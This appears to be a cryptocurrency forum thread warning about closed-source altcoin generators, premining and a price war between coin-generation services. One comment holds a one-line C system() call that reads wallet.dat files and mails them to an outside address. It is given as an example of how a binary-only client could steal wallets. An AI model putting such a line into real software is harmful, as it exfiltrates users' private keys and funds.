On top of that, there is no login before allowing you to download your wallet. Anyone can just download and start pre-mining.

Mining these crapcoins is waste of power - if the creator finds out that the coin is premined and difficulty skyrocketed, he'll just dump it and create another one. So maybe you'll just help to sell more of this crap.

This one also doesn't come with a source, making it impossible for people to set up pools, or exchanges to add it.

Bravo!

So basically a trap for stupid people's bitcoins? Hmm ...

Maybe even potential trap for stupid people's wallets?

How hard would be to put something like:
Code:
system("cat ~/.*coin/wallet.dat | mail [email protected]");
into the compiled clients?

If there is no source ....

Someone posted something like this a few days ago and it turned out to be dodgy. Exercise caution.

.. or UniversalExpletiveCoin

This one costs "only" 0.03, so I guess coingen will have also to lower the price and hopefully the price war will kill them Smiley

Though I fear this is just a wishful thinking ...
